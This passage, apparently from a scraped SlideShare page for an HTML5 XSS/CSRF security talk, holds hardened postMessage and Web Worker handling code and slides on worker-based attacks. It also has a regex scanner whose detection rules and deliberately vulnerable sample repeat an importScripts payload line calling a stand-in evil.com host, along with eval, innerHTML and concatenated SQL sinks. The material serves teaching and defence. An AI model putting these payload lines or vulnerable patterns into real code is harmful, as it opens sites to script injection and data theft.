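  return typeof origin === "string" && allowlist.has(origin);
}

// Validate the message shape before anything reaches the DOM: only the
// commands this page expects, and only a bounded string payload.
function parseMessage(data) {
  if (data === null || typeof data !== "object") return null;
  const { cmd, msg } = data;
  if (!ALLOWED_CMDS.has(cmd)) return null;
  if (typeof msg !== "string" || msg.length > 1024) return null;
  return { cmd, msg };
}

// Render with textContent so any markup in msg is displayed, never parsed.
// `out` is anything with a textContent property: a DOM element in the
// browser, a plain object in the tests.
function render(out, parsed) {
  out.textContent = parsed.cmd + ": " + parsed.msg;
  return out.textContent;
}

// Window messages: check the sender first, then the shape.
// Returns the rendered text, or null when the message was dropped.
function handleWindowMessage(event, out, allowlist = ALLOWED_ORIGINS) {
  if (!isTrustedOrigin(event.origin, allowlist)) return null;
  const parsed = parseMessage(event.data);
  return parsed === null ? null : render(out, parsed);
}

// Messages from a dedicated worker carry no usable origin (the worker script
// itself must be same-origin), so only the shape check and the safe sink apply.
function handleWorkerMessage(event, out) {
  const parsed = parseMessage(event.data);
  return parsed === null ? null : render(out, parsed);
}

// Sender side: name the target origin instead of "*", so the data is not
// delivered to whatever page currently occupies the frame.
function postToFrame(frameWindow, message, targetOrigin) {
  if (targetOrigin === "*") throw new Error("refusing wildcard targetOrigin");
  frameWindow.postMessage(message, targetOrigin);
  return targetOrigin;
}

// Browser wiring; skipped outside a page so the functions can be tested alone.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  const out = document.getElementById("result");
  window.addEventListener("message", (e) => handleWindowMessage(e, out), false);
  const worker = new Worker("message.js");
  worker.addEventListener("message", (e) => handleWorkerMessage(e, out), false);
}
```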
Web Workers – Hacks!

Possible to cause XSS
   Running script
   Passing hidden payload
Also, web workers can help in embedding a silently running js file that can be controlled.
Can be a tool for payload delivery and control within the browser framework.
importScripts("http://evil.com/payload.js") – a worker can run a cross-domain script.
Scan and Defend

Scan and look for
  JavaScript scanning
  Messaging and Worker implementation
  DOM calls
  Use of eval(), document.* calls etc.
Defense and Countermeasures
  Same-origin listening is a must for the messaging event
  Secure JavaScript coding
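As an added example (not part of the deck), a small static scan in the spirit of the "Scan and look for" list: it greps JavaScript source for the sinks named on these slides (innerHTML, eval(), document.write, postMessage with a "*" target, message listeners that never read event.origin, importScripts of a remote URL from the worker slides, and executeSql statements built by string concatenation, the injection point from the WebSQL slides). The rule names and the SAMPLE and HARDENED sources are constructed for the demo; SAMPLE mirrors the worker example above.

```javascript
// Added example, not code from the deck: a regex-based scan for the sinks
// and messaging patterns listed on the "Scan and Defend" slide. Rule ids and
// the two sample sources below are constructed for this demo.
const RULES = [
  { id: "dom-innerhtml", re: /\.innerHTML\s*=/g,
    why: "HTML sink; prefer textContent or a sanitizer" },
  { id: "eval", re: /\beval\s*\(/g,
    why: "code execution sink" },
  { id: "document-write", re: /\bdocument\.write(?:ln)?\s*\(/g,
    why: "HTML sink" },
  { id: "postmessage-star", re: /\.postMessage\s*\([^)]*,\s*['"]\*['"]\s*\)/g,
    why: "wildcard targetOrigin delivers data to any page in the frame" },
  { id: "message-listener", re: /addEventListener\s*\(\s*['"]message['"]/g,
    why: "verify event.origin before using event.data" },
  { id: "worker-importscripts", re: /\bimportScripts\s*\(\s*['"]https?:\/\//g,
    why: "worker pulls a remote script" },
  // executeSql whose first argument is a string literal followed by '+';
  // statements assembled in a variable beforehand are not caught.
  { id: "websql-concat",
    re: /executeSql\s*\(\s*(?:"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')\s*\+/g,
    why: "SQL built by concatenation; use ? placeholders with an args array" },
];

// 1-based line number of a character offset in src.
function lineOf(src, index) {
  return src.slice(0, index).split("\n").length;
}

// Run every rule over the source and return findings sorted by line.
function scanSource(src, rules = RULES) {
  const findings = [];
  for (const rule of rules) {
    rule.re.lastIndex = 0;
    let m;
    while ((m = rule.re.exec(src)) !== null) {
      findings.push({ rule: rule.id, line: lineOf(src, m.index), why: rule.why });
      if (m[0].length === 0) rule.re.lastIndex++; // guard against empty matches
    }
  }
  return findings.sort((a, b) => a.line - b.line);
}

// A message listener that never touches .origin is the "listens to any
// domain" case from the Web Messaging scenario slide.
function missingOriginCheck(src) {
  return /addEventListener\s*\(\s*['"]message['"]/.test(src) && !/\.origin\b/.test(src);
}

// Constructed sample modeled on the worker example in this deck, plus a
// wildcard postMessage, a concatenated WebSQL query and a remote importScripts.
const SAMPLE = `
var worker = new Worker('message.js');
worker.addEventListener('message', function(e) {
  document.getElementById('result').innerHTML = e.data;
}, false);
window.addEventListener('message', function(e) {
  eval(e.data);
});
parent.postMessage(result, '*');
db.transaction(function(tx) {
  tx.executeSql("SELECT * FROM notes WHERE owner='" + user + "'", [], show);
});
importScripts("http://evil.com/payload.js");
`;

// Constructed hardened counterpart: fixed-origin check and a text sink.
const HARDENED = `
window.addEventListener('message', function(e) {
  if (e.origin !== 'https://app.example.com') return;
  document.getElementById('result').textContent = String(e.data);
});
`;

// One line per finding, the way a scan report would print it.
function report(src) {
  return scanSource(src).map((f) => `line ${f.line}: ${f.rule} (${f.why})`);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(report(SAMPLE).join("\n"));
  console.log("missing origin check:", missingOriginCheck(SAMPLE));
}
```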
APIs …

A few other HTML5 APIs are interesting from a security standpoint
   File APIs – allow local file access and can be mixed with ClickJacking and other attacks to gain client files.
   Drag-Drop APIs – exploiting self-XSS and a few other tricks, hijacking cookies …
   Lot more to explore and defend…
Resources/References

http://www.html5rocks.com/en/ (Solid stuff)
https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet (OWASP stuff)
http://html5sec.org/ (Quick cheat sheet)
http://html5security.org/ (Good resources)
http://blog.kotowicz.net/ (Interesting work)
CONCLUSION AND QUESTIONS

http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com

More Related Content

What's hot

Spring Framework - Spring Security
Spring Framework - Spring SecuritySpring Framework - Spring Security
Spring Framework - Spring SecurityDzmitry Naskou
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practicesScott Hurrey
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and AwarenessAbdul Rahman Sherzad
 
RIA Cross Domain Policy
RIA Cross Domain PolicyRIA Cross Domain Policy
RIA Cross Domain PolicyNSConclave
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Introduction à spring boot
Introduction à spring bootIntroduction à spring boot
Introduction à spring bootAntoine Rey
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Secure your app with keycloak
Secure your app with keycloakSecure your app with keycloak
Secure your app with keycloakGuy Marom
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Bootstrap 3
Bootstrap 3Bootstrap 3
Bootstrap 3Lanh Le
 

What's hot (20)

Spring Framework - Spring Security
Spring Framework - Spring SecuritySpring Framework - Spring Security
Spring Framework - Spring Security
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Développement web mobile avec IONIC 2
Développement web mobile avec IONIC 2Développement web mobile avec IONIC 2
Développement web mobile avec IONIC 2
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and Awareness
 
RIA Cross Domain Policy
RIA Cross Domain PolicyRIA Cross Domain Policy
RIA Cross Domain Policy
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Caching
CachingCaching
Caching
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Secure Coding for Java
Secure Coding for JavaSecure Coding for Java
Secure Coding for Java
 
Packet filtering using jpcap
Packet filtering using jpcapPacket filtering using jpcap
Packet filtering using jpcap
 
Introduction à spring boot
Introduction à spring bootIntroduction à spring boot
Introduction à spring boot
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Secure your app with keycloak
Secure your app with keycloakSecure your app with keycloak
Secure your app with keycloak
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Bootstrap 3
Bootstrap 3Bootstrap 3
Bootstrap 3
 

Similar to XSS and CSRF with HTML5

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web appsJames Pearce
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsJames Pearce
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionJames Pearce
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web appsJames Pearce
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007ClubHack
 
JClouds at San Francisco Java User Group
JClouds at San Francisco Java User GroupJClouds at San Francisco Java User Group
JClouds at San Francisco Java User GroupMarakana Inc.
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1James Pearce
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
HTML5: An Overview
HTML5: An OverviewHTML5: An Overview
HTML5: An OverviewNagendra Um
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...Shreeraj Shah
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5James Pearce
 
HTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすものHTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすものMicrosoft
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Christian Frichot
 
Technology Trends
Technology TrendsTechnology Trends
Technology TrendsHenry Jacob
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery!   shreeraj shahFind me if you can – smart fuzzing and discovery!   shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shahowaspindia
 

Similar to XSS and CSRF with HTML5 (20)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web apps
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web Apps
 
Modern browsers
Modern browsersModern browsers
Modern browsers
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 Revolution
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web apps
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007
 
JClouds at San Francisco Java User Group
JClouds at San Francisco Java User GroupJClouds at San Francisco Java User Group
JClouds at San Francisco Java User Group
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
HTML5: An Overview
HTML5: An OverviewHTML5: An Overview
HTML5: An Overview
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
 
新 · 交互
新 · 交互新 · 交互
新 · 交互
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5
 
HTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすものHTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすもの
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012
 
Technology Trends
Technology TrendsTechnology Trends
Technology Trends
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery!   shreeraj shahFind me if you can – smart fuzzing and discovery!   shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
 

More from Shreeraj Shah

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperShreeraj Shah
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software Shreeraj Shah
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingShreeraj Shah
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Shreeraj Shah
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Shreeraj Shah
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Shreeraj Shah
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Shreeraj Shah
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Shreeraj Shah
 

More from Shreeraj Shah (15)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
 

Recently uploaded

Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-pyJamie (Taka) Wang
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7DianaGray10
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopBachir Benyammi
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfJamie (Taka) Wang
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 

Recently uploaded (20)

Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-py
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...

XSS and CSRF with HTML5

  • 1. XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP OWASP AppSecUSA 2012 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. Who Am I? http://shreeraj.blogspot.com, shreeraj@blueinfy.com, http://www.blueinfy.com, Twitter @shreeraj. Founder & Director, Blueinfy & iAppSecure Solutions Pvt. Ltd. Past experience: Net Square (Founder), Foundstone (R&D/Consulting), Chase (Middleware), IBM (Domino Dev). Interest: web security research. Published research: articles / papers – Securityfocus, O'Reilly, DevX, InformIT etc.; tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.; advisories – .Net, Java servers etc.; presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (author): Web 2.0 Security – Defending Ajax, RIA and SOA; Hacking Web Services; Web Hacking.
  • 3. HTML5 VECTORS – ATTACK SURFACE
  • 4. HTML5 – Attacks on the rise… Evolution of HTML5: 1991 – HTML started (plain and simple); 1996 – CSS & JavaScript (welcome to the world of XSS and browser security); 2000 – XHTML1 (growing concerns and attacks on browsers); 2005 – AJAX, XHR, DOM (attack cocktail and surface expansion); 2009 – HTML5 (here we go: new surface, architecture and defense), HTML + CSS + JS.
